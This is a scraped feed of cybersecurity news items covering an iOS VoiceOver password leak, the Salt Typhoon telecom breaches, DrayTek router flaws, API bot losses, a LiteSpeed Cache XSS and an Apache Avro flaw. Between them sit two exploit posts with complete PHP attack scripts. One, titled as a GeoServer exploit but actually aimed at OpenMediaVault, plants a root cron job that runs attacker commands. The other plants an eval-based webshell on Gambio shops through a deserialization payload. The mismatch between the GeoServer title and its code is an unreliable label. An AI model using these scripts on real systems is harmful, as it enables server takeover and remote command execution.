Apple has fixed a security issue in iOS (and iPadOS) that could have leaked a user's passwords through the VoiceOver feature.

Apple has issued security updates for iOS 18.0.1 and iPadOS 18.0.1 which includes a fix for a bug that could allow a user’s saved passwords to be read aloud by its VoiceOver feature.

VoiceOver allows users to use their iPhone or iPad even if they can’t see the screen. It gives audible descriptions of what’s on your screen—for example, the battery level, who’s calling you, or what item your finger is on.

Unfortunately, that also included an audible description of a user’s saved passwords, effectively reading aloud someone’s passwords.

While the chance of abusing this vulnerability is relatively small—the device would have to be unlocked and in the attacker’s proximity to exploit it—it’s always better to install security updates as soon as possible. Once criminals know vulnerabilities exist they tend to go looking for unpatched vulnerable devices.

The patch for the flaw (listed as CVE-2024-44207) is available for iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.

To check if you’re using the latest software version of iOS and iPadOS, go to **Settings** > **General** > **Software Update**. You want to be on iOS 18.0.1 or iPadOS 18.0.1.

If you’re not on the latest version, you can update from this screen. It’s also worth turning on Automatic Updates if you haven’t already, which you can also do from this screen.

Preferred setting for automatic updates

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 iPhone flaw could read your saved passwords out loud. Update now! 

GeoServer version 2.25.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : GeoServer 2.25.1 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/geoserver/                                                                                               |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 118 set your target .[+] Line 123  set your command to execute.[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenMediaVaultExploit{    private $targetUri;    private $username;    private $password;    private $persistent;    private $cronUuid;    private $versionNumber;    public function __construct($targetUri, $username, $password, $persistent = false)    {        $this->targetUri = $targetUri;        $this->username = $username;        $this->password = $password;        $this->persistent = $persistent;    }    private function sendRequest($url, $data)    {        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json'        ]);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function login()    {        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";        $data = [            'service' => 'Session',            'method' => 'login',            'params' => [                'username' => $this->username,                'password' => $this->password            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return isset($response['authenticated']) && $response['authenticated'] === true;    }    public function checkTarget()    {        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";        $data = [            'service' => 'System',            'method' => 'getInformation',            'params' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        return $response;    }    public function checkVersion($response)    {        if (!empty($response)) {            $version = $response['response']['version'] ?? null;            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;        }        return null;    }    public function executeCommand($cmd)    {        echo "Executing command...\n";        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';        $data = [            'service' => 'Cron',            'method' => 'set',            'params' => [                'uuid' => $uuid,                'enable' => true,                'execution' => 'exactly',                'minute' => $schedule,                'hour' => $schedule,                'dayofmonth' => $schedule,                'month' => $schedule,                'dayofweek' => $schedule,                'username' => 'root',                'command' => $cmd,                'sendemail' => false,                'comment' => '',                'type' => 'userdefined'            ],            'options' => null        ];        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);        $this->cronUuid = $response['response']['uuid'] ?? '';        $this->applyConfigChanges();        echo "Cron payload execution triggered.\n";    }    public function applyConfigChanges()    {        $data = [            'service' => 'Config',            'method' => 'applyChangesBg',            'params' => [                'modules' => [],                'force' => false            ],            'options' => null        ];        $this->sendRequest($this->targetUri . '/rpc.php', $data);    }    public function removePayload()    {        if (!$this->persistent) {            $data = [                'service' => 'Cron',                'method' => 'delete',                'params' => [                    'uuid' => $this->cronUuid                ]            ];            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);            if ($response) {                $this->applyConfigChanges();                echo "Cron payload entry successfully removed.\n";            } else {                echo "Cannot access cron services to remove payload.\n";            }        }    }}// Usage$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);if ($exploit->login()) {    $response = $exploit->checkTarget();    if ($response) {        $exploit->versionNumber = $exploit->checkVersion($response);        $exploit->executeCommand('your-command-here');        $exploit->removePayload();    }}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GeoServer 2.25.1 Code Injection

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gambio.com/                                                                                                     |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit {    private $targetUrl;    private $webshellName;    private $postParam;    private $getParam;    private $phpCmdFunction;    public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {        $this->targetUrl = $targetUrl;        $this->phpCmdFunction = $phpCmdFunction;        $this->webshellName = $webshellName ?: $this->randomString() . '.php';        $this->postParam = $this->randomString();        $this->getParam = $this->randomString();    }    // Random string generator    private function randomString($length = 8) {        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    // Function to send HTTP POST request    private function sendPostRequest($uri, $data) {        $url = $this->targetUrl . $uri;        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => http_build_query($data),            ],        ];        $context = stream_context_create($options);        return file_get_contents($url, false, $context);    }    // Upload webshell to target    public function uploadWebshell() {        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $finalPayload = base64_encode(serialize([            "GuzzleHttp\\Cookie\\FileCookieJar" => [                "cookies" => [                    "GuzzleHttp\\Cookie\\SetCookie" => [                        "data" => [                            "Value" => $phpPayload,                            "Domain" => "target.com",                            "Path" => "/",                        ]                    ]                ],                "filename" => $this->webshellName            ]        ]));        $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [            'checkout_started' => 0,            'search' => $finalPayload,            'firstname' => 'test',            'lastname' => 'test',        ]);        echo "Webshell uploaded to: {$this->webshellName}\n";    }    // Execute PHP payload    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}", [            $this->postParam => $payload        ]);        echo "Executed command via webshell: {$cmd}\n";    }    // Execute command    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [            $this->postParam => $payload        ]);        echo "Executed command: {$cmd}\n";    }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gambio Online Webshop 4.9.2.0 Code Injection

China’s Salt Typhoon hacked AT&T, Verizon, and Lumen, compromising wiretap systems used in criminal investigations. The breach, linked…

China’s Salt Typhoon hacked AT&T, Verizon, and Lumen, compromising wiretap systems used in criminal investigations. The breach, linked to China, poses national security concerns in the United States and affects sensitive telecom infrastructure.

A sophisticated hacking group known as Salt Typhoon believed to be linked to **China**, has breached the systems of major U.S. telecom companies AT&T, Verizon, and Lumen Technologies, potentially compromising sensitive government data.

This was reported by the Wall Street Journal raising significant national security concerns, as the attackers may have accessed systems used to handle court-authorized wiretapping—critical tools in tracking criminal and national security activities.

****What Happened?****

The group, described as an advanced persistent threat (**APT**) with ties to the Chinese state, infiltrated several large broadband providers. According to sources familiar with the breach, Salt Typhoon targeted these telecom networks to gain access to sensitive information, possibly including data about government wiretapping operations. This capability is key for law enforcement in monitoring suspects and building cases against criminal organizations.

The breaches reportedly include systems that work with government wiretap requests, and it is feared that hackers could have intercepted these communications, compromising ongoing criminal investigations. The WSJ also mentioned the possibility of the group accessing broader internet traffic, increasing the severity of the breach.

****Who Was Affected?****

AT&T, Verizon, and Lumen Technologies were named as the primary victims of the attack, but it’s suggested that the impact may not be limited to these companies alone. According to the **report**, some of the affected telecom companies are also involved in providing services to other firms, which might imply a more widespread exposure of data.

Moreover, the attackers might have gained access to systems used for domestic communications, though it remains unclear whether they also compromised systems handling foreign intelligence surveillance.

****National Security Concerns****

This incident is a matter of serious concern because wiretapping systems are part of the infrastructure used for investigating serious crimes and addressing national security threats. If a **foreign state-linked group** gains access to these systems, it puts sensitive information and ongoing investigations at risk. The cyber attack impacts much more than just private information—hackers could learn about investigation tactics, and targets, or even exploit data.

The Wall Street Journal report highlights how this is not the first time Chinese groups have been accused of targeting critical communication systems. The same hackers, known by other names such as FamousSparrow and GhostEmperor, have been previously linked to attacks on government institutions, law firms, and telecommunications networks globally.

Lumen Technologies, which has been actively tracking Chinese APTs like **Volt Typhoon** and **Flax Typhoon**, declined to provide specific comments on the incident, but industry watchers believe a detailed report may be forthcoming.

****What’s Being Done?****

Telecom companies and cybersecurity experts are on high alert. Microsoft and other firms are also investigating the incident to understand the depth of the breach and secure vulnerable systems.

It is worth noting that Microsoft has also been a victim of Chinese hackers in the past. **In September 2023**, the technology giant revealed that Chinese hackers had stolen its signing key to breach Outlook accounts. Weeks later, the company further **acknowledged** that the hackers had stolen 60,000 U.S. State Department emails from Microsoft.

Salt Typhoon’s actions show the ongoing risks to critical infrastructure in the United States and other countries, emphasizing the need for improved cybersecurity against sophisticated cyberattacks.

****Previous CyberSecurity Incidents at AT&T and Verizon****

This is not the first time that AT&T has been breached. **In August 2021**, the infamous ShinyHunters hacker group was selling an AT&T database with 70 million social security numbers (SSN). The telecom initially rubbished the group’s claims but confirmed **in April 2024** that the data breach impacted over 73 million customers.

Verizon has faced several cybersecurity threats in the past, including a **December 2012 incident** in which 3 million customer records were leaked online. **In March 2016**, a hacker attempted to sell 1.5 million Verizon customer records on the dark web. **In July 2017**, an incident led to the exposure of personal details of 14 million customers.

****Next Steps for Users and Companies****

If you are a user of AT&T, Verizon, or Lumen services, experts recommend ensuring all accounts have strong passwords and considering two-factor authentication (2FA) where possible. Though this particular incident seems to focus on infrastructure-level breaches, end users must remain alert against **potential scams or phishing attempts** that often follow high-profile breaches.

For companies, it’s vital to review and update security protocols, especially those involved with sensitive government collaborations. This attack reveals how sophisticated threat actors can exploit even well-secured systems, emphasizing the need for ongoing monitoring, timely updates, and response plans to address vulnerabilities effectively.

The story of Salt Typhoon and its infiltration of telecom giants like AT&T and Verizon is far from over. As more details emerge, it will be critical for industry leaders and governments to fortify defences, share threat intelligence, and collaborate to counter such sophisticated cyberattacks.

1.  **CIA’s 11-year-old hacking campaign against China exposed**
2.  **FBI Dismantles Chinese-Linked Botnet of 260,000 IoT Devices**
3.  **United Airlines Hacked by Chinese Group Behind The OPM Breach**
4.  **Chinese SMS Phishing Group Hits iPhone Users in India Post Scam**
5.  **China Hacked Federal Deposit Insurance Corporation with Malware**
6.  **Five Eyes Accuses Chinese APT40 for Hacking Government Networks**

China’s Salt Typhoon Hacks AT&T and Verizon, Accessing Wiretap Data: Report

Critical security vulnerabilities exposed in DrayTek Vigor routers: Discover how to protect your network from these serious flaws.…

Critical security vulnerabilities exposed in DrayTek Vigor routers: Discover how to protect your network from these serious flaws. Learn about the risks, affected devices, and how to patch your router immediately. Secure your network now!

Censys research has revealed 14 vulnerabilities in **DrayTek Vigor routers**, with British Telecoms being one of the most vulnerable hosts followed by hosts in Vietnam, The Netherlands, and Taiwan. 

Businesses and home users worldwide commonly use routers. Therefore, these flaws pose a significant risk, allowing attackers to potentially take control of your network devices and launch further attacks. The vulnerabilities were publicly disclosed on 2 October 2024, while the users most impacted by the vulnerabilities include the following:

*   **Taiwan**
*   **Vietnam**
*   **Germany**
*   **Netherlands**
*   **United Kingdom**

****What are the vulnerabilities?****

Fourteen vulnerabilities were discovered, ranging from critical to medium severity. The most concerning ones are:

*   **CVE-2024-41592** (CVSS Score: 10.0): This critical buffer overflow vulnerability in the web interface can be exploited to crash the router (Denial-of-Service) or even gain complete control (Remote Code Execution) if chained with CVE-2024-41585. This buffer overflow can be triggered by sending a long query string to CGI pages.
*   **CVE-2024-41585** (CVSS Score: 9.1): This vulnerability is an OC command injection flaw, which allows attackers to inject malicious code into the router’s operating system, potentially granting full access to the device. The exploit chain impacts Vigor router models 3910 and 3912.

****High-Severity Vulnerabilities:****

*   **CVE-2024-41586**: A cross-site scripting (XSS) vulnerability in the router’s web interface could allow an attacker to inject malicious code into web pages visited by users, potentially leading to unauthorized access or data theft.
*   **CVE-2024-41587**: Another XSS vulnerability in the web interface could be exploited to steal sensitive information from users, such as login credentials.
*   **CVE-2024-41588**: A remote code execution vulnerability in the router’s Telnet service could allow an attacker to gain unauthorized access to the device and execute arbitrary commands.

****Why is this a big deal?****

According to Censys’ **repor**t shared with Hackread.com, over 700,000 (i-e 751,801) DrayTek Vigor routers are currently exposed directly to the internet, making them easy targets for attackers. The VigorConnect admin UI is exposed on 421,476 devices. The largest concentrations of these interfaces come from national ISPs and regional telecom providers, and Taiwan-based HINET is leading the list, as DrayTek is a Taiwanese company.

An exposed VigorConnect Admin Interface (Via Censys)

Exploiting these vulnerabilities can lead to a domino effect, allowing attackers to compromise your entire network. Moreover, DrayTek routers have been targeted in the past, with the **FBI reporting** (PDF) Chinese-sponsored botnet activity using older CVEs in DrayTek routers and **Volt Typhoon exploiting** SOHO networking equipment to carry out attacks last year, making patching a necessity.

DrayTek has **released patches** for all of these vulnerabilities. It is important to update your router’s firmware to the latest version to protect yourself from these threats. Additionally, it is recommended to follow the security best practices, such as disabling remote access to the router’s web interface and enabling two-factor authentication (**2FA**), to stay protected.

1.  **TheMoon Malware Returns: 6K Asus Routers Hacked in 72 Hours**
2.  **ASUS and NordVPN Partner to Integrate VPN Service into Routers**
3.  **New DDoS Botnet ‘Condi’ Targets Vulnerable TP-Link AX21 Routers**
4.  **FBI Alert: Russian Hackers Target Ubiquiti Routers for Botnet Creation**
5.  **NETGEAR Router Vulnerability Allowed Access to Restricted Services**

Critical Vulnerabilities Expose Nearly 1 Million DrayTek Routers Globally

Organizations are losing between $94 - $186 billion annually to vulnerable or insecure APIs (Application Programming Interfaces) and automated abuse by bots. That’s according to The Economic Impact of API and Bot Attacks report from Imperva, a Thales company. The report highlights that these security threats account for up to 11.8% of global cyber events and losses, emphasizing the escalating

Organizations are losing between $94 - $186 billion annually to vulnerable or insecure APIs (Application Programming Interfaces) and automated abuse by bots. That's according to The Economic Impact of API and Bot Attacks report from Imperva, a Thales company. The report highlights that these security threats account for up to 11.8% of global cyber events and losses, emphasizing the escalating risks they pose to businesses worldwide.

Drawing on a comprehensive study conducted by the Marsh McLennan Cyber Risk Intelligence Center, the report analyzes over 161,000 unique cybersecurity incidents. The findings demonstrate a concerning trend: the threats posed by vulnerable or insecure APIs and automated abuse by bots are increasingly interconnected and prevalent. Imperva warns that failing to address security risks associated with these threats could lead to substantial financial and reputational damage.

**API Adoption and the Expanding Attack Surface**

APIs have become indispensable to modern business operations, enabling seamless communication and data exchange across applications and services. They power everything from mobile applications to eCommerce platforms and open banking. However, their widespread adoption has created significant security challenges. According to data from Imperva Threat Research, the average enterprise managed 613 API endpoints in production last year, and that number is projected to grow as companies rely more heavily on APIs to drive digital transformation and innovation.

This heightened reliance on APIs has dramatically expanded the attack surface, with API-related security incidents increasing by 40% in 2022 and an additional 9% in 2023. These attacks are particularly dangerous because APIs often serve as direct pathways to an organization's underlying infrastructure and sensitive data. The report estimates that API insecurity is responsible for up to $87 billion in annual losses, a $12 billion increase from 2021. This can be attributed to a variety of reasons, including the rapid adoption of APIs, inexperience of many API developers, lack of standardized security practices, and limited collaboration between development and security teams.

**Bot Attacks: A Persistent and Evolving Threat**

Alongside the rise in attacks on APIs, bot attacks have become a widespread and costly threat, resulting in up to $116 billion in losses annually. Bots—automated software programs designed to perform specific tasks—are frequently weaponized for malicious activities such as credential stuffing, web scraping, online fraud, and distributed denial-of-service (DDoS) attacks.

In 2022, security incidents related to bots surged by 88%, followed by an additional 28% increase in 2023. This alarming growth was fueled by a combination of factors, including the rise in digital transactions, proliferation of APIs, and geopolitical tensions such as the Russia-Ukraine conflict. The widespread availability of attack tools and generative AI models has also significantly enhanced bot evasion techniques and enabled even low-skilled attackers to carry out sophisticated bot attacks.

According to Imperva, bots now represent one of the most critical threats to API security. Last year, 30% of all API attacks were driven by automated threats, with 17% specifically tied to bots exploiting business logic vulnerabilities. The growing reliance on APIs—and their direct access to sensitive data—has made them prime targets for bot operators. Automated API abuse alone is now costing businesses up to $17.9 billion annually. As bots become more sophisticated, attackers are increasingly using them to exploit API business logic, bypass security measures, and exfiltrate sensitive data, making detection and mitigation more challenging for organizations.

**Large Enterprises at Greater Risk**

Large enterprises, especially those with annual revenues exceeding $1 billion, face a disproportionately higher risk of API and bot attacks. According to the report, these organizations are 2-3 times more likely to experience automated API abuse by bots compared to small or mid-size businesses. This heightened exposure is primarily driven by the complexity and scale of their digital infrastructures.

These companies typically manage hundreds or even thousands of APIs across multiple departments and services, creating sprawling API ecosystems that are challenging to monitor and secure. Within such environments, shadow APIs, unauthenticated APIs, and deprecated APIs present significant vulnerabilities. These mismanaged APIs often lack critical security measures, such as regular updates, authentication, and continuous monitoring, leaving them open to exploitation.

Similarly, large enterprises are prime targets for bot attacks due to their extensive digital presence and valuable assets. The more complex the digital environment, the more potential entry points exist for bots to exploit, ranging from login pages to checkout systems. With vast amounts of sensitive data flowing through their applications and APIs, these companies are a highly lucrative target for bot operators.

The risk is even more pronounced for enterprises with annual revenues exceeding $100 billion, where API insecurity and bot attacks account for as much as 26% of all security incidents. This stark figure highlights the critical need for comprehensive API security and bot management strategies in large enterprises, where a security incident can result in significant operational disruptions, substantial financial losses, and long-lasting reputational damage.

**Protecting Against API and Bot Attacks**

Together, vulnerable or insecure APIs and automated abuse by bots account for billions of dollars in annual losses. As businesses increasingly rely on APIs to power digital transformation, the risk of security incidents is expected to rise, putting organizations at greater risk of financial and reputational damage. Simultaneously, the evolution of bots, often driven by generative AI, has amplified the challenges of defending against these threats.

To effectively mitigate these risks, Imperva recommends that organizations take the following proactive steps:

*   **Foster cross-functional collaboration:** Collaboration between security and development teams is essential for embedding security into every stage of the API lifecycle. This partnership ensures that security measures are integrated from design to deployment, enabling proactive identification and mitigation of vulnerabilities before they can be exploited. When it comes to bot management, this collaboration must extend even further. Bots are a cross-functional challenge that impacts many areas of the business. To effectively combat them, teams across marketing, eCommerce, customer experience, IT, Line of Business, and security must work closely together. This broader collaboration helps identify vulnerable features, such as login pages, checkout processes, and forms, that are particularly susceptible to bot attacks.
*   **Comprehensive API discovery and monitoring:** Organizations must have full visibility into all their APIs, including shadow, deprecated, and unauthenticated APIs, to ensure none are overlooked. Continuous monitoring and auditing are essential to identifying potential vulnerabilities before they are exploited.
*   **Integrate API security and bot management:** Bot management and API security must be used in tandem to successfully mitigate automated attacks on API libraries. This combined approach helps identify vulnerable APIs, continuously monitors for automated attacks, and provides actionable insights for rapid detection and response. By integrating bot management and API security, businesses can better protect against sophisticated automated threats while gaining visibility to detect and mitigate risks before they cause a security incident.

As API ecosystems continue to expand and bots become more sophisticated, the cost of inaction will only rise. Organizations must address the security risks associated with APIs and bots to protect sensitive data, mitigate financial losses, and safeguard their brand reputation.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Vulnerable APIs and Bot Attacks Costing Businesses Up to $186 Billion Annually

The popular LiteSpeed Cache plug-in is vulnerable to unauthenticated privilege escalation via a dangerous XSS flaw.

Source: Primakov via Shutterstock

A WordPress plug-in installed more than 6 million times is vulnerable to a cross-site scripting flaw (XSS) that allows attackers to escalate privileges and potentially install malicious code to enable redirects, ads, and other HTML payloads onto an affected website.

A security researcher who goes by the online name "TaiYou" discovered the flaw, tracked as CVE-2024-47374, in LiteSpeed Cache, known as the most popular caching plug-in for the WordPress content management system (CMS). TaiYou reported the flaw on Sept. 24 to Patchstack via the Patchstack Bug Bounty Program for WordPress; it affects LiteSpeed Cache through version 6.5.0.2, and users should update immediately to avoid being vulnerable to attack.

LiteSpeed Cache is described by its developers as an "all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection of optimization features." It supports WordPress Multisite and is compatible with the most popular plug-ins, including WooCommerce, bbPress, and Yoast SEO.

The flaw that requires immediate attention is an unauthenticated stored XSS vulnerability that "could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request," according to Patchstack.

XSS is one of the most oft-exploited and oldest Web vulnerabilities, allowing an attacker to inject malicious code into a legitimate webpage or application to execute malicious scripts that affect the person visiting the site.

**Three WordPress Plug-in Flaws, One Dangerous**

TaiYou actually found three flaws in the plug-in, including another XSS flaw as well as a path-traversal vulnerability. However, only CVE-2024-47374 is considered dangerous and expected to be exploited by attackers, according to Patchstack.

Upon notification by Patchstack, the developers of LiteSpeed cache plug-in sent back a patch for validation on the same day. Patchstack published an update that fixes all three flaws in LiteSpeed cache version 6.5.1 on Sept. 25, and added the flaws to its vulnerability database five days later.

CVE-2024-47374 is characterized as creating "Improper Neutralization of Input During Web Page Generation," according to its listing on CVEdetails.com. "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users," according to the listing.

The vulnerability occurs because the code that handles the view of a queue in a particular piece of the plug-in doesn’t implement sanitization and output escaping, according to Patchstack.

"The plugin outputs a list of URLs that are queued for unique CSS generation and with the URL another functionality called 'Vary Group' is printed on the Admin page," according to the blog post.

In this output, the "Vary Group" functionality combines the concepts of "cache varies" and "user roles." "The vulnerability occurs because Vary Group can be supplied by a user via an HTTP Header and printed on the admin page without sanitization," according to Patchstack.

**Update & Mitigate CVE-2024-47374**

Due to its widespread use as a foundation for websites, the WordPress platform and its plug-ins especially are a notoriously popular target for threat actors, giving them easy access to a broad attack surface. Attackers particularly like to target singular plug-ins with large install bases, which makes vulnerable versions of LiteSpeed Cache a likely target.

The patch for CVE-2024-47374 is "fairly simple," sanitizing the output using esc\_html, according to Patchstack. The company issued a virtual patch to mitigate the flaw by blocking any attacks until its customers have updated to a fixed version. Meanwhile, all administrators of WordPress sites that use LiteSpeed Cache are advised to update to fixed version 6.5.1 immediately.

Patchstack also recommends that WordPress website developers working with the plug-in apply escaping and sanitization to any message that will be displayed as an admin notice to mitigate the vulnerability.

"Depending on the context of the data, we recommend using sanitize\_text\_field to sanitize value for HTML output (outside of HTML attribute) or esc\_html," according to the post. "For escaping values inside of attributes, you can use the esc\_attr function."

Patchstack also recommends that site developers working with LiteSpeed Cache also apply a proper permission or authorization check to the registered rest route endpoints to avoid exposing a site to XSS vulnerability.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Single HTTP Request Can Exploit 6M WordPress Sites

A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances.
The flaw, tracked as CVE-2024-47561, impacts all versions of the software prior to 1.11.4.
"Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute

Open Source / Software Security

A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances.

The flaw, tracked as **CVE-2024-47561**, impacts all versions of the software prior to 1.11.4.

"Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code," the project maintainers said in an advisory released last week. "Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue."

Apache Avro, analogous to Google's Protocol Buffers (protobuf), is an open-source project that provides a language-neutral data serialization framework for large-scale data processing.

The Avro team notes that the vulnerability affects any application if it allows users to provide their own Avro schemas for parsing. Kostya Kortchinsky from the Databricks security team has been credited with discovering and reporting the security shortcoming.

As mitigations, it's recommended to sanitize schemas before parsing them and avoid parsing user-provided schemas.

"CVE-2024-47561 affects Apache Avro 1.11.3 and previous versions while de-serializing input received via avroAvro schema," Mayuresh Dani, Manager, manager of threat research at Qualys, said in a statement shared with The Hacker News.

"Processing such input from a threat actor leads to execution of code. Based on our threat intelligence reporting, no PoC is publicly available, but this vulnerability exists while processing packages via ReflectData and SpecificData directives and can also be exploited via Kafka."

"Since Apache Avro is an open-source project, it is used by many organizations. Based on publicly available data, a majority of these organizations are located in the US. This definitely has a lot of security implications if left unpatched, unsupervised and unprotected."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Apache Avro SDK Flaw Allows Remote Code Execution in Java Applications

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.
Get the scoop before it's too late!
⚡ Threat of the Week
Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

Cybersecurity / Weekly Recap

Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week's cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans.

Get the scoop before it's too late!

****⚡ Threat of the Week****

**Double Trouble: Evil Corp & LockBit Fall:** A consortium of international law enforcement agencies took steps to arrest four people and take down nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation. In tandem, authorities outed a Russian national named Aleksandr Ryzhenkov, who was one of the high-ranking members of the Evil Corp cybercrime group and also a LockBit affiliate. A total of 16 individuals who were part of Evil Corp have been sanctioned by the U.K.

  
****🔔 Top News****

*   **DoJ & Microsoft Seize 100+ Russian Hacker Domains:** The U.S. Department of Justice (DoJ) and Microsoft announced the seizure of 107 internet domains used by a Russian state-sponsored threat actor called COLDRIVER to orchestrate credential harvesting campaigns targeting NGOs and think tanks that support government employees and military and intelligence officials.
*   **Record-Breaking 3.8 Tbps DDoS Attack:** Cloudflare revealed that it thwarted a record-breaking distributed denial-of-service (DDoS) attack that peaked at 3.8 terabits per second (Tbps) and lasted 65 seconds. The attack is part of a broader wave of over a hundred hyper-volumetric L3/4 DDoS attacks that have been ongoing since early September 2024 targeting financial services, Internet, and telecommunication industries. The activity has not been attributed to any specific threat actor.
*   **North Korean Hackers Deploy New VeilShell Trojan:** A North Korea-linked threat actor called APT37 has been attributed as behind a stealthy campaign targeting Cambodia and likely other Southeast Asian countries that deliver a previously undocumented backdoor and remote access trojan (RAT) called VeilShell. The malware is suspected to be distributed via spear-phishing emails.
*   **Fake Trading Apps on Apple and Google Stores:** A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims as part of what's called a pig butchering scam. The apps are no longer available for download. The campaign has been found to target users across Asia-Pacific, Europe, Middle East, and Africa. In a related development, Gizmodo reported that Truth Social users have lost hundreds of thousands of dollars to pig butchering scams.
*   **700,000+ DrayTek Routers Vulnerable to Remote Attacks:** As many as 14 security flaws, dubbed DRAY:BREAK, have been uncovered in residential and enterprise routers manufactured by DrayTek that could be exploited to take over susceptible devices. The vulnerabilities have been patched following responsible disclosure.

****📰 Around the Cyber World****

*   **Salt Typhoon Breached AT&T, Verizon, and Lumen Networks:** A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. "The hackers appear to have engaged in a vast collection of internet traffic from internet service providers that count businesses large and small, and millions of Americans, as their customers."
*   **U.K. and U.S. Warn of Iranian Spear-Phishing Activity:** Cyber actors working on behalf of the Iranian Government's Islamic Revolutionary Guard Corps (IRGC) have targeted individuals with a nexus to Iranian and Middle Eastern affairs to gain unauthorized access to their personal and business accounts using social engineering techniques, either via email or messaging platforms. "The actors often attempt to build rapport before soliciting victims to access a document via a hyperlink, which redirects victims to a false email account login page for the purpose of capturing credentials," the agencies said in an advisory. "Victims may be prompted to input two-factor authentication codes, provide them via a messaging application, or interact with phone notifications to permit access to the cyber actors."
